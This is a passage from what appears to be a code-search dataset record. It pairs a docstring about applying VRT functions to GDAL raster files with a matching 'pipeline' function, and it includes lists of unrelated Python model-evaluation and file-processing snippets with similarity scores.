train ==\"\n ev = evaluate()\n features, labels, stats = getfeaturesandlabels(trainset, semantic=semantic, predict=False)\n print counters, '\\n'\n\n print \"== test ==\"\n counters.clear()\n ftest, ltest, stest = getfeaturesandlabels(testset, semantic=semantic, predict=predict)\n print counters\n for exp in exptypes:\n vec, X, y = create_matrix(features[exp], labels[exp])\n if externals:\n vecw, Xw, yw = create_matrix(features[exp + 'w'], labels[exp + 'w'])\n vecimp, Ximp, yimp = create_matrix(features[exp + 'w'], labels[exp + 'implicit'])\n if loadmodels:\n clf = read_model(loadmodels + exp)\n else:\n clf = create_model(X, y)\n if externals:\n clfw = create_model(Xw, yw)\n clfimp = create_model(Ximp, yimp)\n if savemodels:\n write_model(clf, savemodels + exp)\n print \"== eval ==\"\n if deprep:\n print \"== {} ==\".format(deprep)\n Xt, yt = transform_to_matrix(ftest[exp], ltest[exp], vec)\n if externals:\n Xtw, ytw = transform_to_matrix(ftest[exp + 'w'], ltest[exp + 'w'], vecw)\n Xtimp, ytimp = transform_to_matrix(ftest[exp + 'w'], ltest[exp + 'implicit'], vecimp)\n results = clf.predict_proba(Xt)\n s_p_w = False\n s_p_imp = False\n gold_p1 = ev.get_unique_exp(copy.deepcopy(stest['positions'][exp + 'w']), exp, count=False)\n gold_p2 = copy.deepcopy(gold_p1)\n gold_p3 = copy.deepcopy(gold_p1)\n if clfw:\n resultsw = clfw.predict_proba(Xtw)\n s_p_w=ev.get_system_pairs_prob(stest['positions'][exp + 'w'], resultsw, gold_p1)\n counters['s_p_w' + exp] = len(s_p_w)\n if DEBUG:\n print \"RESULTSW\"\n print resultsw\n if clfimp:\n resultsimp = clfimp.predict_proba(Xtimp)\n s_p_imp=ev.get_system_pairs_prob(stest['positions'][exp + 'implicit'], resultsimp, gold_p2)\n counters['s_p_imp' + exp] = len(s_p_imp)\n if DEBUG:\n print \"RESULTSIMP\"\n print resultsimp\n s_p_int=ev.get_system_pairs_prob(stest['positions'][exp], results, gold_p3)\n counters['s_p_int' + exp] = len(s_p_int)\n system_pairs_exp = ev.merge_system_pairs(s_p_int, s_p_imp=s_p_imp, s_p_w=s_p_w)\n counters['system_pairs_all' + exp] = len(system_pairs_exp)\n for pair in system_pairs_exp:\n if 'confidence' in pair and pair['confidence'] > 0:\n counters['system_pairs' + exp] += 1\n if predict:\n ssc_exp = ev.spansetcoverage_o_p(system_pairs_exp, exptype=exp)\n print \"system exp - {}:\\n{}\".format(exp, prf_prettystring(ssc_exp))\n else:\n ssc_exp = ev.spansetcoverage_o_p(system_pairs_exp, exptype=exp)\n print \"gold exp - {}:\\n{}\".format(exp, prf_prettystring(ssc_exp))\n system_pairs.extend(system_pairs_exp)\n if predict:\n ssc = ev.spansetcoverage_o_p(system_pairs)\n print \"system exp - all:\\n\", prf_prettystring(ssc)\n else:\n ssc = ev.spansetcoverage_o_p(system_pairs)\n print \"gold exp - all: \\n\", prf_prettystring(ssc)\n \n for k,v in sorted(counters.items(), key=lambda x: x[0]):\n print k, v\n if isinstance(deprep, basestring):\n dump_jsonfile(system_pairs, 'system_pairs-' + deprep + '.json')\n return {'stats': stest, 'system_pairs': system_pairs}", "def _evaluate_loss(self, batch_data, evaluate_settings=None, inference_mode=None):\n\n if not (type(inference_mode) is bool):\n raise TrainerStateInvalidException(\"Inference mode is not set\")\n\n if not inference_mode:\n # @tf.function on the train step level\n return self._call_model(batch_data, evaluate_settings, inference_mode)\n else:\n return self._call_model_tf_func(batch_data, evaluate_settings, tf.constant(inference_mode, dtype=tf.bool))", "def test(self, test_data_path):\n test_data = read_datafile(test_data_path)\n test_data = self.preprocessor.preprocess(test_data)\n self.run(test_data)\n if check_format(self.get_result_path()):\n thresholds, precisions, avg_precision, reciprocal_rank, num_relevant = evaluate(test_data_path,\n self.get_result_path())\n return avg_precision", "def evaluate(input_path, model_path, metrics_path):\n\n logger = logging.getLogger(__name__)\n\n logger.info(\"Loading input dataset\")\n dataset = pd.read_csv(input_path)\n\n X_eval = dataset.drop(\"Survived\", axis=1)\n y_eval = dataset[\"Survived\"]\n\n logger.info(\"Loading model\")\n model = joblib.load(model_path)\n\n logger.info(\"Calculating metrics\")\n scorer = metrics.make_scorer(metrics.mean_squared_error)\n cv_results = cross_validate(model, X=X_eval, y=y_eval, scoring=scorer, cv=5)\n\n metric_values = {\"mse\": cv_results[\"test_score\"].mean()}\n\n logger.info(f\"Writing output to {metrics_path}\")\n with open(metrics_path, \"w\") as file_:\n json.dump(metric_values, file_)", "def evaluate(self, data_collection):\n # map inputs\n mapped_input_dict = self._dict_from_data_collection(self.input_mapping,\n data_collection)\n\n # combine auxiliary inputs with mapped inputs\n all_inputs = mapped_input_dict.copy()\n all_inputs.update(self.auxiliary_inputs)\n\n # evaluate meter\n outputs_dict = self.evaluate_raw(**all_inputs)\n\n # combine auxiliary outputs with raw outputs\n all_outputs = outputs_dict.copy()\n all_outputs.update(self.auxiliary_outputs)\n\n\n # map meter evaluations back to data_collection form\n mapped_output_data_collection = self._data_collection_from_dict(\n self.output_mapping, all_outputs)\n\n # combine with original data, add tags as necessary\n mapped_output_data_collection.add_tags(self.tagspace)\n\n return mapped_output_data_collection", "def run(self):\n self.evaluate()\n self.accumulate()\n self.summarize()", "def evaluate_raw(self):\n message = \"Use the meter.evaluate(data_collection) method for\" \\\n \"YamlDefinedMeters.\"\n raise NotImplementedError(message)", "def evaluate(data_folder):\n seq_length=150\n g = tf.Graph()\n with g.as_default():\n # Load dataset.\n provider = data_provider_kush.get_provider(FLAGS.task)(data_folder)\n num_classes = 6\n audio, ground_truth, num_examples = provider.get_split(FLAGS.portion, FLAGS.batch_size)\n\n # Define model graph.\n with slim.arg_scope([slim.batch_norm],\n is_training=False):\n predictions = models_kush.get_model(FLAGS.model,ground_truth)(audio, num_lstm_modules=FLAGS.num_lstm_modules)\n #pred_argmax = tf.argmax(predictions, 1) \n #lab_argmax = tf.argmax(labels, 1)\n\t\n metrics = {\n \"eval/accuracy\": slim.metrics.streaming_mean_squared_error(predictions, ground_truth[:,seq_length-1,:])\n }\n\n total_error = tf.reduce_sum(tf.square(tf.subtract(ground_truth[:,seq_length-1,:], tf.reduce_mean(ground_truth[:,seq_length-1,:]))))\n unexplained_error = tf.reduce_sum(tf.square(tf.subtract(ground_truth[:,seq_length-1,:], predictions)))\n R_squared = tf.subtract(tf.cast(1, tf.float32), tf.divide(total_error, unexplained_error))\n print('R_squared value: ',R_squared)\n for i in range(num_classes):\n name ='eval/mse_{}'.format(i)\n recall = slim.metrics.streaming_mean_squared_error(predictions[:,i],ground_truth[:,seq_length-1,i])\n metrics[name] = recall\n\n metrics['R_squared']=(R_squared,tf.subtract(tf.cast(1, tf.float32), tf.div(total_error, unexplained_error)))\n #print(zip(metrics.values()))\n #metric_names = metrics.keys()\n #value_ops, update_ops = zip(*metrics.values())\n #names_to_values, names_to_updates = dict(zip(metric_names, value_ops)), dict(zip(metric_names, update_ops))\n names_to_values, names_to_updates = slim.metrics.aggregate_metric_map(metrics)\n \n summary_ops = []\n metrics = dict()\n for name, value in names_to_values.items():\n op = tf.summary.scalar(name, value)\n op = tf.Print(op, [value], name)\n summary_ops.append(op)\n metrics[name] = value\n\n # Computing the unweighted average recall and add it into the summaries.\n uar = sum([metrics['eval/mse_{}'.format(i)] for i in range(num_classes)]) / num_classes\n op = tf.summary.scalar('eval/mse', uar)\n op = tf.Print(op, [uar], 'eval/mse')\n summary_ops.append(op)\n\n num_examples = FLAGS.num_examples or num_examples\n num_batches = math.ceil(num_examples / float(FLAGS.batch_size))\n logging.set_verbosity(1)\n\n # Setup the global step.\n slim.get_or_create_global_step()\n\n # How often to run the evaluation.\n eval_interval_secs = FLAGS.eval_interval_secs \n\n slim.evaluation.evaluation_loop(\n '',\n FLAGS.checkpoint_dir,\n FLAGS.log_dir,\n num_evals=num_batches,\n eval_op=list(names_to_updates.values()),\n summary_op=tf.summary.merge(summary_ops),\n eval_interval_secs=eval_interval_secs)", "def evaluate(self, data: dataset.Dataset, batch_size: int = 32) -> Any:\n ds = data.gen_tf_dataset(\n batch_size, is_training=False, preprocess=self._preprocess)\n return self._model.evaluate(ds)", "def evaluate(pred_file, ref_file):\n ref_dict, pred_dict, query_dict, id_dict = build_pred_ref_dict(ref_file, pred_file, ref_file)\n total, acc, scores = res_eval_with_type_acc(query_dict, pred_dict, ref_dict, id_dict, save=False)\n em = calculate_exact_match(pred_dict, ref_dict)\n print('Comp Acc: {:.3f}%\\tBleu-4: {:.3f}\\tRouge-L: {:.3f}'.format(acc, scores['Bleu-4'], scores['Rouge-L']))\n print('EM: {:.3f}%'.format(em))\n # calculate_sketch_type_acc(ref_file, pred_file)\n # calculate_exact_match_for_each_q_type(ref_file, pred_file)\n return total, acc, scores, em", "def validate(self):\n stats = {}\n evaluate_config = {\"verbose\": self.verbose}\n evaluate_config.update(self.config.get(\"evaluate_config\", {}))\n\n results = self.model.evaluate(self.test_dataset, **evaluate_config)\n if results is None:\n # Using local Model since model.evaluate() returns None\n # for MultiWorkerMirroredStrategy\n logger.warning(\"Running a local model to get validation score.\")\n self.local_model = self.model_creator(self.config)\n self.local_model.set_weights(self.model.get_weights())\n results = self.local_model.evaluate(self.test_dataset,\n **evaluate_config)\n\n if isinstance(results, list):\n stats = {\n \"validation_\" + k: v\n for k, v in zip(self.model.metrics_names, results)\n }\n else:\n stats = {\"loss\": results}\n\n return stats", "def evaluate(hparams, summary_dir, num_gpus, model_type, eval_set, eval_size,\n eval_shard, data_dir, num_targets, dataset, validate, seed,\n shuffled, shift, pad, batch_size=100, checkpoint=None):\n output_dir = summary_dir\n load_dir = summary_dir + '/train/'\n summary_dir += '/eval/' + FLAGS.dataset + '/' + eval_set\n with tf.Graph().as_default():\n features = get_features(eval_set, batch_size, num_gpus, data_dir,\n num_targets, dataset, validate, evaluate=True,\n seed=seed, shuffled=shuffled, shift=shift,\n pad=pad, eval_shard=eval_shard)\n model = models[model_type](hparams)\n result, _ = model.multi_gpu(features, num_gpus)\n test_writer = tf.summary.FileWriter(summary_dir)\n seen_step = -1\n paused = 0\n while paused < 360:\n print('start evaluation, model defined')\n if checkpoint:\n step = extract_step(checkpoint)\n last_checkpoint = checkpoint\n else:\n step, last_checkpoint = find_checkpoint(load_dir, seen_step)\n if step == -1:\n time.sleep(60)\n paused += 1\n else:\n paused = 0\n seen_step = step\n run_experiment(load_eval, last_checkpoint, test_writer,\n eval_experiment, model, result,\n eval_size // batch_size, features=features,\n eval_set=eval_set, output_dir=output_dir,\n unsupervised=hparams.unsupervised,\n num_gpus=num_gpus)\n if checkpoint:\n break\n\n test_writer.close()", "def _evaluate_fn(model, dataset):\n # Reset the local variables so that the returned metrics are computed using\n # the given data. Similar to the `reset_states` method of `tf.metrics.Metric`.\n for var in model.local_variables:\n if var.initial_value is not None:\n var.assign(var.initial_value)\n else:\n var.assign(tf.zeros_like(var))\n\n def eval_fn(dummy_state, batch):\n \"\"\"Evaluates the model on a batch.\"\"\"\n model.forward_pass(batch, training=False)\n return dummy_state\n\n # Evaluate on the dataset.\n dataset.reduce(initial_state=0, reduce_func=eval_fn)\n\n # Obtain the metrics.\n results = collections.OrderedDict()\n local_outputs = model.report_local_outputs()\n for name, metric in local_outputs.items():\n if isinstance(metric, list) and (len(metric) == 2):\n # Some metrics returned by `report_local_outputs()` can have two scalars:\n # one represents `sum`, and the other represents `count`. Ideally, we want\n # to return a single scalar for each metric.\n results[name] = metric[0] / metric[1]\n else:\n results[name] = metric[0] if isinstance(metric, list) else metric\n return results", "def eval_perf_total(model, X_train, y_train, X_test, y_test):\n\n y_hat_train = model.predict(X_train)\n y_hat_test = model.predict(X_test)\n \n train_mae = metrics.mean_absolute_error(y_train, y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f' Train Mean Absolute Error: {train_mae:,.2f}')\n print(f' Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n print('\\n'+'---'*25+'\\n')\n\n test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n test_r = metrics.r2_score(y_test, y_hat_test)\n\n print('Evaluating Performance on Testing Data:\\n')\n print(f' Test Mean Absolute Error: {test_mae:,.2f}')\n print(f' Test Mean Squared Error: {test_mse:,.2f}\\n')\n print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n print(f'Test R-Square Value: {round(test_r,2)}')", "def evaluate(\n config,\n _,\n pstate,\n eval_ds,\n rng,\n unused_num_eval_steps = -1,\n):\n logging.info(\"Starting evaluation.\")\n eval_metrics = None\n state = flax_utils.unreplicate(pstate)\n\n render_loop = instant_ngp_utils.make_render_loop(state.params, config)\n with utils.StepTraceContextHelper(\"eval\", 0) as trace_context:\n for step, batch in enumerate(eval_ds): # pytype: disable=wrong-arg-types\n data = jax.tree_map(jnp.asarray, batch)\n render_poses = data[\"c2w\"]\n hwf = data[\"hwf\"]\n rng = jax.random.fold_in(rng, step)\n\n frames = []\n for pose in render_poses:\n frames.append(\n render_loop(instant_ngp_utils.camera_ray_batch(pose, hwf), rng)[0]\n )\n psnrs_test = [\n -10 * jnp.log10(jnp.mean(jnp.square(rgb - gt)))\n for (rgb, gt) in zip(frames, data[\"images\"])\n ]\n psnr_test = np.array(psnrs_test).mean()\n eval_metrics = EvalMetrics.single_from_model_output(psnr=psnr_test)\n trace_context.next_step()\n eval_info = {\n \"out\": jnp.concatenate([x[None, Ellipsis] for x in frames], axis=0),\n \"gtr\": data[\"images\"],\n }\n return eval_metrics, eval_info", "def _evaluate(self, x):\n raise NotImplementedError()", "def __call__(self, test_data, verbose=True):\n\n self.model.eval()\n with torch.no_grad():\n loss, rho, nmse = self._iteration(test_data)\n if verbose:\n print(f'\\n=> Test result: \\nloss: {loss:.3e}'\n f' rho: {rho:.3e} NMSE: {nmse:.3e}\\n')\n return loss, rho, nmse" ]
[ "0.6641769", "0.66378486", "0.62046313", "0.6194362", "0.6182727", "0.61543846", "0.6143863", "0.61434543", "0.6132906", "0.61051583", "0.6086003", "0.60806614", "0.60806614", "0.6062375", "0.60618806", "0.6046971", "0.604346", "0.603338", "0.60103774", "0.60077417", "0.60042995", "0.600045", "0.599409", "0.59850633", "0.59844273", "0.597519", "0.59740853", "0.5954438", "0.59376717", "0.59191453", "0.58973527", "0.58740664", "0.5866037", "0.5865239", "0.58331716", "0.5809086", "0.580573", "0.58054024", "0.57872725", "0.5780027", "0.57743084", "0.5768616", "0.5767731", "0.5764745", "0.5760096", "0.5758343", "0.57427204", "0.57421696", "0.5737063", "0.5736322", "0.57342345", "0.5733124", "0.57322717", "0.57206833", "0.57161224", "0.57148075", "0.57081324", "0.57063794", "0.5699823", "0.56965196", "0.5689107", "0.5684422", "0.5667683", "0.56664205", "0.56570786", "0.5655871", "0.5652238", "0.56500983", "0.5647138", "0.5642938", "0.5637388", "0.56364655", "0.56318176", "0.5630196", "0.5625515", "0.5615498", "0.5615437", "0.5600947", "0.55988467", "0.55903345", "0.5590074", "0.55858266", "0.5583357", "0.5580276", "0.5575671", "0.5571724", "0.55711406", "0.55701953", "0.5563676", "0.5561428", "0.5560663", "0.5557713", "0.5557201", "0.55563456", "0.5550451", "0.5545374", "0.5539956", "0.55391276", "0.5537199", "0.5530665", "0.55126756" ]
0.0
-1
Applies VRTfunctions to a GDALreadable inputfile, rendering outputfile. Functions must be an iterable of singleparameter functions that take a filename as input.
def pipeline(inputfile, outputfile, functions, **kwargs): if not functions: raise ValueError('Must have at least one function') tmpfiles = [] try: previous = inputfile for name, f in functions: logging.debug(name) vrt = f(previous) current = vrt.get_tempfile(suffix='.vrt', prefix='gdal') tmpfiles.append(current) previous = current.name logging.info('Rendering reprojected image') return vrt.render(outputfile=outputfile, **kwargs) finally: for f in tmpfiles: f.close()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(fn_input, fn_output):\n # read file\n inter = Interpolator()\n inter.read_file(fn_input)\n inter.write_interpolated(fn_output)", "def merge(files: List[str], output_file: str, resample: str = \"average\") -> None:\n\n build_vrt(constants.TEMP_VRT_FILE, files, resample)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', 'YES')\n\n gdal.Translate(destName=output_file, srcDS=constants.TEMP_VRT_FILE)\n\n gdal.SetConfigOption('GDAL_VRT_ENABLE_PYTHON', None)\n\n if os.path.isfile(constants.TEMP_VRT_FILE):\n os.remove(constants.TEMP_VRT_FILE)", "def run(self):\n\t\tif not self.is_valid:\n\t\t\traise ValueError('Paths are not valid')\n\t\t\n\t\tfrom manipulators.run import all_functions\n\t\tinput_file = open(self.input_path, 'rb')\n\t\tinput_csv = csv.reader(input_file, delimiter=',')\n\t\toutput_file = open(self.output_path, 'wb')\n\t\toutput_csv = csv.writer(output_file, delimiter=',')\n\t\tall_functions(input_csv, output_csv)", "def build_vrt(vrt: str, files: List[str], resample_name: str) -> None:\n\n options = gdal.BuildVRTOptions(srcNodata=0)\n gdal.BuildVRT(destName=vrt, srcDSOrSrcDSTab=files, options=options)\n add_pixel_fn(vrt, resample_name)", "def run_transform(i_fn, o_fn):\n if not (all(is_bed(fn) for fn in [i_fn, o_fn]) or all(is_vcf(fn) for fn in [i_fn, o_fn])):\n raise ValueError(\"Input and output must be both BED or VCF\")\n with get_reader(i_fn) as reader:\n with get_writer(o_fn, reader.samples) as writer:\n for r in reader:\n writer.writeRecord(transform_coordinate_of_sv(r))", "def convert_vrt(fname, out_fname, dataset_name='dataset',\n compression=H5CompressionFilter.LZF, filter_opts=None,\n attrs=None):\n with h5py.File(out_fname) as fid:\n with rasterio.open(fname) as rds:\n # set default chunks and set dimensions\n if rds.count == 3:\n chunks = (3, 256, 256)\n dims = (3, rds.height, rds.width)\n else:\n chunks = (256, 256)\n dims = (rds.height, rds.width)\n\n # create empty or copy the user supplied filter options\n if not filter_opts:\n filter_opts = dict()\n filter_opts['chunks'] = chunks\n else:\n filter_opts = filter_opts.copy()\n\n\n if 'chunks' not in filter_opts:\n filter_opts['chunks'] = chunks\n\n # modify to have 3D chunks if we have a multiband vrt\n if rds.count == 3 and len(filter_opts['chunks']) != 3:\n # copy the users original 2D chunk and insert the third\n chunks = list(filter_opts['chunks'])\n chunks.insert(0, 3)\n filter_opts['chunks'] = chunks\n\n # dataset attributes\n if attrs:\n attrs = attrs.copy()\n else:\n attrs = {}\n\n attrs['geotransform'] = rds.transform.to_gdal()\n attrs['crs_wkt'] = rds.crs.wkt\n\n # dataset creation options\n kwargs = compression.config(**filter_opts).dataset_compression_kwargs()\n kwargs['shape'] = dims\n kwargs['dtype'] = rds.dtypes[0]\n\n dataset = fid.create_dataset(dataset_name, **kwargs)\n attach_image_attributes(dataset, attrs)\n\n # tiled processing (all cols by chunked rows)\n ytile = filter_opts['chunks'][1] if rds.count == 3 else filter_opts['chunks'][0]\n tiles = generate_tiles(rds.width, rds.height, rds.width, ytile)\n\n for tile in tiles:\n # numpy index\n if rds.count == 3:\n idx = (\n slice(None),\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n else:\n idx = (\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n\n # ensure single band rds is read as 2D not 3D\n data = rds.read(window=tile) if rds.count == 3 else rds.read(1, window=tile)\n\n # write\n dataset[idx] = data", "def create_user_functions():\n\n # user_function.lgi useing PARAM_A and PARAM_B for slope and intercept\n lagrit_input = \"\"\"\ncmo/DELATT/mo_pts/dfield\ncompute / distance_field / mo_pts / mo_line_work / dfield\nmath/multiply/mo_pts/x_four/1,0,0/mo_pts/dfield/PARAM_A/\nmath/add/mo_pts/x_four/1,0,0/mo_pts/x_four/PARAM_B/\ncmo/copyatt/mo_pts/mo_pts/fac_n/x_four\nfinish\n\"\"\"\n f = open('user_function.lgi', 'w')\n f.write(lagrit_input)\n f.close()\n\n # user_function2.lgi uses PARAM_A2 and PARAM_B2 for slope and intercept\n lagrit_input = \"\"\"\ncmo/DELATT/mo_pts/dfield\ncompute / distance_field / mo_pts / mo_line_work / dfield\nmath/multiply/mo_pts/x_four/1,0,0/mo_pts/dfield/PARAM_A2/\nmath/add/mo_pts/x_four/1,0,0/mo_pts/x_four/PARAM_B2/\ncmo/copyatt/mo_pts/mo_pts/fac_n/x_four\nfinish\n\"\"\"\n f = open('user_function2.lgi', 'w')\n f.write(lagrit_input)\n f.close()", "def __call__(self, format, filename):\n # turn the filename into something suitable for use in #define's\n prettyname = filename.replace(\".\", \"_\").upper()\n prettyname = prettyname.replace(\"/\", \"__\")\n prettyname = prettyname.replace(\":\", \"__\")\n prettyname = prettyname.replace(\"-\", \"__\")\n\n # try and open the file\n with open(filename, \"w\") as output:\n self.writeFuncsLut[format]( output, prettyname )", "def analyze(file,process):\n readin(file)\n # inspecting(file, functions)\n process(file, functions)", "def compute_functions(file_name,E_max,E_min,gamma,gamma_k):\n\n file = open(file_name,'r')\n data = file.readlines()\n file.close()\n\n print \"Computing functions\"\n all_lor = []\n for fila in data[2:]:\n vals = map(eval,fila.split())\n if(len(vals)>1):\n if(vals[1]>E_min and vals[1] < E_max):\n ek = vals[1]\n weight = 0\n for j in range(2,len(vals)):\n weight += vals[j]\n A = get_func(vals[0],vals[1],weight,gamma,gamma_k)\n all_lor.append(A)\n\n return all_lor", "def process_function(regexDict: typing.Dict[str, str], fileContent: str, flags: int = re.IGNORECASE) -> str:\n\t\tfor pattern, replace in sorted(regexDict.items()):\n\t\t\tfileContent = re.sub(pattern, replace, fileContent, flags=flags)\n\t\treturn fileContent", "def make_vrt(self):\n for index, i in enumerate(self.months):\n month = str(index + 1)\n if len(month) < 2:\n month = '0' + month\n txt_file = i.joinpath('subnational/tiffs.txt')\n outfile = i.joinpath(f'{self.country}_{month}_normalised.vrt')\n if not outfile.exists():\n gdal_cmd = f'gdalbuildvrt -input_file_list {str(txt_file)} {str(outfile)}'\n subprocess.call(gdal_cmd, shell=True)", "def cli(source_f, raster_f, output, verbose):\n with fiona.open(source_f, 'r') as source:\n source_driver = source.driver\n source_crs = source.crs\n sink_schema = source.schema.copy()\n\n source_geom = source.schema['geometry']\n if source_geom == 'Point':\n sink_schema['geometry'] = '3D Point'\n elif source_geom == 'LineString':\n sink_schema['geometry'] = '3D LineString'\n elif source_geom == '3D Point' or source_geom == '3D LineString':\n pass\n else:\n click.BadParameter(\"Source geometry type {} not implemented\".format(source_geom))\n\n with rasterio.open(raster_f) as raster:\n if source_crs != raster.crs:\n click.BadParameter(\"Features and raster have different CRS.\")\n if raster.count > 1:\n warnings.warn(\"Found {0} bands in {1}, expected a single band raster\".format(raster.bands, raster_f))\n supported = ['int16', 'int32', 'float32', 'float64']\n if raster.dtypes[0] not in supported:\n warnings.warn(\"Found {0} type in {1}, expected one of {2}\".format(raster.dtypes[0], raster_f, supported))\n with fiona.open(\n output, 'w',\n driver=source_driver,\n crs=source_crs,\n schema=sink_schema) as sink:\n\n for feature in source:\n try:\n feature_z = drapery.drape(raster, feature)\n sink.write({\n 'geometry': mapping(feature_z),\n 'properties': feature['properties'],\n })\n except Exception:\n logging.exception(\"Error processing feature %s:\", feature['id'])\n #print(sink.closed)\n #print(raster.closed)\n #print(source.closed)", "def process_data(*args, **kwargs):\n\n filepath = kwargs[\"filepath\"]\n func = kwargs[\"func\"]\n \n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(datafile)\n print('{}/{} files processed.'.format(i, num_files))", "def parse_flt_files(files=[], info=None, uniquename=False, use_visit=False,\n get_footprint = False, \n translate = {'AEGIS-':'aegis-', \n 'COSMOS-':'cosmos-', \n 'GNGRISM':'goodsn-', \n 'GOODS-SOUTH-':'goodss-', \n 'UDS-':'uds-'}): \n \n if info is None:\n if not files:\n files=glob.glob('*flt.fits')\n \n if len(files) == 0:\n return False\n \n info = get_flt_info(files)\n else:\n info = info.copy()\n \n for c in info.colnames:\n if not c.islower(): \n info.rename_column(c, c.lower())\n\n if 'expstart' not in info.colnames:\n info['expstart'] = info['exptime']*0.\n\n so = np.argsort(info['expstart'])\n info = info[so]\n\n #pa_v3 = np.round(info['pa_v3']*10)/10 % 360.\n pa_v3 = np.round(info['pa_v3']) % 360.\n \n target_list = []\n for i in range(len(info)):\n #### Replace ANY targets with JRhRmRs-DdDmDs\n if info['targname'][i] == 'ANY': \n if use_visit:\n new_targname=info['file'][i][:6]\n else:\n new_targname = 'par-'+radec_to_targname(ra=info['ra_targ'][i],\n dec=info['dec_targ'][i])\n \n target_list.append(new_targname.lower())\n else:\n target_list.append(info['targname'][i])\n \n target_list = np.array(target_list)\n\n info['progIDs'] = [file[1:4] for file in info['file']]\n\n progIDs = np.unique(info['progIDs'])\n visits = np.array([os.path.basename(file)[4:6] for file in info['file']])\n dates = np.array([''.join(date.split('-')[1:]) for date in info['date-obs']])\n \n targets = np.unique(target_list)\n \n output_list = [] #OrderedDict()\n filter_list = OrderedDict()\n \n for filter in np.unique(info['filter']):\n filter_list[filter] = OrderedDict()\n \n angles = np.unique(pa_v3[(info['filter'] == filter)]) \n for angle in angles:\n filter_list[filter][angle] = []\n \n for target in targets:\n #### 3D-HST targname translations\n target_use = target\n for key in translate.keys():\n target_use = target_use.replace(key, translate[key])\n \n ## pad i < 10 with zero\n for key in translate.keys():\n if translate[key] in target_use:\n spl = target_use.split('-')\n try:\n if (int(spl[-1]) < 10) & (len(spl[-1]) == 1):\n spl[-1] = '{0:02d}'.format(int(spl[-1]))\n target_use = '-'.join(spl)\n except:\n pass\n\n for filter in np.unique(info['filter'][(target_list == target)]):\n angles = np.unique(pa_v3[(info['filter'] == filter) & \n (target_list == target)])\n \n for angle in angles:\n exposure_list = []\n exposure_start = []\n product='{0}-{1:05.1f}-{2}'.format(target_use, angle, filter) \n\n visit_match = np.unique(visits[(target_list == target) &\n (info['filter'] == filter)])\n \n this_progs = []\n this_visits = []\n \n for visit in visit_match:\n ix = (visits == visit) & (target_list == target) & (info['filter'] == filter)\n #this_progs.append(info['progIDs'][ix][0])\n #print visit, ix.sum(), np.unique(info['progIDs'][ix])\n new_progs = list(np.unique(info['progIDs'][ix]))\n this_visits.extend([visit]*len(new_progs))\n this_progs.extend(new_progs)\n \n for visit, prog in zip(this_visits, this_progs):\n visit_list = []\n visit_start = []\n visit_product = '{0}-{1}-{2}-{3:05.1f}-{4}'.format(target_use, prog, visit, angle, filter) \n \n use = ((target_list == target) & \n (info['filter'] == filter) & \n (visits == visit) & (pa_v3 == angle) &\n (info['progIDs'] == prog))\n \n if use.sum() == 0:\n continue\n\n for tstart, file in zip(info['expstart'][use],\n info['file'][use]):\n \n f = file.split('.gz')[0]\n if f not in exposure_list:\n visit_list.append(str(f))\n visit_start.append(tstart)\n \n exposure_list = np.append(exposure_list, visit_list)\n exposure_start.extend(visit_start)\n \n filter_list[filter][angle].extend(visit_list)\n \n if uniquename:\n print(visit_product, len(visit_list))\n so = np.argsort(visit_start)\n exposure_list = np.array(visit_list)[so]\n #output_list[visit_product.lower()] = visit_list\n \n d = OrderedDict(product=str(visit_product.lower()),\n files=list(np.array(visit_list)[so]))\n output_list.append(d)\n \n if not uniquename:\n print(product, len(exposure_list))\n so = np.argsort(exposure_start)\n exposure_list = np.array(exposure_list)[so]\n #output_list[product.lower()] = exposure_list\n d = OrderedDict(product=str(product.lower()),\n files=list(np.array(exposure_list)[so]))\n output_list.append(d)\n \n ### Get visit footprint from FLT WCS\n if get_footprint:\n from shapely.geometry import Polygon\n \n N = len(output_list)\n for i in range(N):\n for j in range(len(output_list[i]['files'])):\n flt_file = output_list[i]['files'][j]\n if (not os.path.exists(flt_file)) & os.path.exists('../RAW/'+flt_file):\n flt_file = '../RAW/'+flt_file\n \n flt_j = pyfits.open(flt_file)\n h = flt_j[0].header\n if (h['INSTRUME'] == 'WFC3') & (h['DETECTOR'] == 'IR'):\n wcs_j = pywcs.WCS(flt_j['SCI',1])\n else:\n wcs_j = pywcs.WCS(flt_j['SCI',1], fobj=flt_j)\n \n fp_j = Polygon(wcs_j.calc_footprint())\n if j == 0:\n fp_i = fp_j\n else:\n fp_i = fp_i.union(fp_j)\n \n output_list[i]['footprint'] = fp_i\n \n return output_list, filter_list", "def load_from_function(function, path_to_file, **kwargs):\n return function(path_to_file, **kwargs)", "def apply(input, output, fields, delimiter, encoding, verbose, format_in, zipfile, script, filter):\n if verbose:\n enableVerbose()\n options = {}\n options['delimiter'] = delimiter\n options['fields'] = fields\n options['output'] = output\n options['encoding'] = encoding\n options['format_in'] = format_in\n options['zipfile'] = zipfile\n options['filter'] = filter\n options['script'] = script\n acmd = Transformer()\n acmd.script(input, options)\n pass", "def write_func(functions, filename=def_func_name):\n file = open(filename + \".txt\", \"w\")\n for i in range(3):\n line = str(functions[i])\n file.write(line+'\\n')\n file.close()", "def translate_files(input_file, output_file, translate_dict, delete_symbols):\n\n for line in input_file:\n result = translate(line, translate_dict, delete_symbols)\n output_file.write(result)", "def process_input_files(inputs):\n for ifile in inputs:\n with open(ifile) as fin:\n exec(compile(fin.read(), ifile, 'exec'))", "def add_pixel_fn(filename: str, resample_name: str) -> None:\n\n 